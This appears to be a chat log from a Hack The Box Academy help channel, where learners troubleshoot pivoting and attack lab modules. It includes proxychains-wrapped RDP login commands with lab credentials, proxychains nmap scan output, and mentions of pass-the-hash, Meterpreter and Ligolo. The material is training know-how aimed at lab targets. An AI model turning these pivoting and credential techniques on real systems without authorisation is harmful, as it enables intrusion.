Can i dm you what i got? Maybe im inputting it wrong and dont realize but I know I got the answer
I haven't done that module, but if you have the right answer it'll accept it
@trim pivot Please take care not to post content from modules above tier 0, especially spoilers for skill assessments
Hi, sorry about that—I didn’t mean to spoil anything. I didn’t realize what I shared might be considered too detailed, since it takes quite a few steps to get to that point. I was mainly trying to understand why my approach with Meterpreter and Ligolo didn’t work, and whether the spooler service being stopped is intentional or part of the challenge design
@heady hare dm me if u still need help
Have tried banner grabbing through netcat
Try on another service if running
What are you using?pwnbox or vm
vm
Try passing the hash, if still not successfull they use rules...
Main os is windows and in that u run linux and in linux u r using rdp ? Am i right?
yes
im in RDP through kali vm
So first copy from rdp and paste it in your kali, then again copy from kali...then you will be able to paste in windows
1 second
oh that could work, i'll try soon but im having a problem
with some module atm
Ohkk
Which one, if i have done that maybe i would be able to help
hey guys, I need help. I am doing Attacking Common Services - Attacking FTP. In this I am able to download the user file but not able to download the password file, please help me out
Dm me
Battery low i will be back after charging my phone
In 30 40 mins
need help please:
proxychains4 xfreerdp3 /v:172.16.5.19 /u:victor /p:pass@123 /cert:ignore /sec:tls
the window opens but unable to login need help: https://academy.hackthebox.com/module/158/section/1426
try wrapping the password in single quotes
no progress with this command: proxychains4 xfreerdp /v:172.16.5.19 /u:victor /p:'pass@123' /cert:ignore /sec:tls
I also tried to manually login in the rdp....no progress
however when I use port forwarding concept for a single rdp port it works...Idk why this behaviour
I hope i was able to help you
hey im stuck in skill assessment for LLM Output Attack, i got JSON response error a lot. Can anyone help?
Which module
LLM Output Attack
Ohh i havent done that
@obsidian schooner - you can dm me if you want (just you, others, please ask permission first)
I am unable to find the ports using proxychains nmap....where as in the Module it is mentioned otherwise, need some assistance
┌──(kali㉿kali)-[~/Downloads]
└─$ proxychains nmap -v -Pn -sT 172.16.5.19
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-31 03:16 EDT
Initiating Parallel DNS resolution of 1 host. at 03:16
Completed Parallel DNS resolution of 1 host. at 03:16, 0.15s elapsed
Initiating Connect Scan at 03:16
Scanning 172.16.5.19 [1000 ports]
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 1.00% done; ETC: 03:21 (0:04:57 remaining)
Completed Connect Scan at 03:16, 31.31s elapsed (1000 total ports)
Nmap scan report for 172.16.5.19
Host is up (0.053s latency).
All 1000 scanned ports on 172.16.5.19 are in ignored states.
Not shown: 990 filtered tcp ports (no-response), 10 filtered tcp ports (host-unreach)
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 31.48 seconds
link to module: https://academy.hackthebox.com/module/158/section/1426
Try with sudo
I'm stuck at web-edition skill assessment . Trying to find the hidden admin directory which contains the api key
U ARE AWESOME!!! I was stuck on this for the past 6 hours...Thank you!!!
Hahahaa
I can feel that
it's always the simplest stuff ppl forget eh
umm just a one thing more please then...ill be on speed
i am using: sudo proxychains4 xfreerdp /v:172.16.5.19 /u:victor /p:'pass@123' /cert:ignore /sec:tls
on the same module...but idk why I am unable to login
Sometimes some tools are not allowed to run as sudo
I wasn't using sudo...you are absolutely right on this
I also used it without sudo
Try resetting the target, changing vpn regions, restarting your vm
but still the username or password is incorrect. xfreerdp3 automatically assigned the username as DC01\victor. I also tried using the password manually
Otherwise reach out to support
Need some help? Learn how to reach the support team on Academy.
you mean my approach is right...it might be an error on the box?
The password looks correct, and unless you messed up your config, it should all be right